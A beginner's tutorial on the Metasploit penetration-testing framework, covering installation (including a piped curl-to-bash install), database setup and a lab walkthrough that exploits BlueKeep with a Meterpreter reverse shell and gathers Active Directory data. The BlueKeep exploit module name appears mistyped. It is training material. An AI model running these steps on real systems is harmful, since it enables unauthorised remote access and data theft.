Metasploit for Beginners.

[Fixxx]

Metasploit Framework is a powerful platform for penetration testing that allows security professionals to explore vulnerabilities, utilize exploits, manage sessions on target systems and conduct comprehensive training experiments in a lab environment. Metasploit emerged in the early 2000s and quickly gained popularity. Initially, it was a tool for testing specific exploits, but over time, it evolved into a universal platform with a vast library of modules, built-in payloads and tools for managing test results.

Key Features of Metasploit​

Metasploit offers several key functions that enhance the efficiency of penetration testers:

• Scanning: Quickly identifies open ports, service versions and potential entry points.
• Exploits: Ready-made attack scripts for known vulnerabilities.
• Payloads: Programs executed on the target machine after a successful exploit.
• Session Management: Control over the target system for access rights analysis and security testing.

​

​

Metasploit helps structure the penetration testing process and provides a systematic understanding of how vulnerabilities work and what attack scenarios are possible

Main Components of Metasploit: Modules and Payloads​

Metasploit is built around a modular system, making it flexible and convenient for various penetration testing tasks. Each module serves a specific purpose and understanding these components is the first step toward confidently using the framework.

Module Type	Purpose	When to Use
Exploit	Uses a specific vulnerability of the target system to gain access.	When a vulnerability is known and an attack demonstration is needed.
Auxiliary	Support modules for scanning, information gathering and vulnerability checking.	During reconnaissance and system analysis, before applying exploits.
Post	Modules for post-exploitation tasks: information gathering, privilege checking and cleaning traces.	After gaining access to explore the system and assess attack consequences.
Payload	Payloads that run on the target machine after an exploit (from commands to Meterpreter).	Depending on the goal: basic payload for testing, Meterpreter for full control.

For beginners, it's advisable to start with small lab experiments. For instance, scanning a virtual test machine using an auxiliary module can help identify open services and potential weaknesses. After that, attempting an exploit on a vulnerable system, launching a basic payload and confirming the connection to the target can be a next step.

Installing Metasploit​

Metasploit can be installed on almost any modern system and the process is simpler than it may seem.
Following instructions, ensuring a safe experimental environment is crucial - especially for newcomers.

​

Installation Steps​

• On Kali Linux:

Metasploit comes pre-installed. Updating packages with sudo apt update && sudo apt install metasploit-framework is sufficient. Check the version with msfconsole --version.

• On Linux (Ubuntu/Debian): Install dependencies:

sudo apt update
sudo apt install curl git ruby-full build-essential libsqlite3-dev

Download Metasploit via the official installer:

curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfupdate.sh | sudo bash

Verify the console launch with msfconsole.

• On Windows:

Download the official installer from the Rapid7 website, run the installation and check the launch through the Metasploit Console menu or msfconsole in PowerShell.

Setting Up the Environment​

After installation, it's important to configure the working environment for comfort and safety:

• Update the exploit database: Always update the framework before starting with msfupdate.
• Configure PATH and aliases: On Linux, adding msfconsole to PATH or creating an alias for quick launch is convenient.
• Use virtual labs: Setting up a test environment in VirtualBox or VMware allows safe experimentation with exploits and payloads.

Configuring PostgreSQL Database for Metasploit​

Metasploit works with numerous modules, exploits and sessions, making a database essential for effective testing. PostgreSQL is the standard solution for the framework, providing stable information storage. The database in Metasploit is not just a luxury - it's necessary for convenient operation. PostgreSQL is used for storing scan results, host lists, sessions and history. However, it may be turned off by default. A quick solution is:

sudo systemctl start postgresql
msfdb init

After this, Metasploit will work with the database, allowing you to search for exploits through search instead of manually.

Practical Examples of Using Metasploit​

After setting up and configuring your environment, it's time to see Metasploit in action. It's best to start with a safe lab environment, such as a virtual machine like Metasploitable, where you can experiment with exploits and payloads without risk.

Example Scenario: Exploiting the BlueKeep Vulnerability​

Here’s a step-by-step breakdown of how to use Metasploit to exploit the BlueKeep vulnerability:

1. Identify Vulnerable Hosts: Use the auxiliary module to scan for vulnerable hosts. For BlueKeep, you can use:

   use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

2. Generate and Launch the Exploit: Once you identify a vulnerable host, generate a specific payload using the exploit module:

   use exploit/windows/rdp/cve20190708bluekeeprce
    set payload windows/x64/meterpreter/reverse_tcp

3. Establish a Remote Session: After setting the payload, run the exploit to establish a remote session with Meterpreter.
4. Gather Information: Use various post-exploitation modules to collect information. For example, to gather data from Active Directory, you can use:

   use post/windows/gather/ad_to_sqlite

These basic steps help you understand the logic of Metasploit, the sequence of actions during testing and prepare you for more complex scenarios.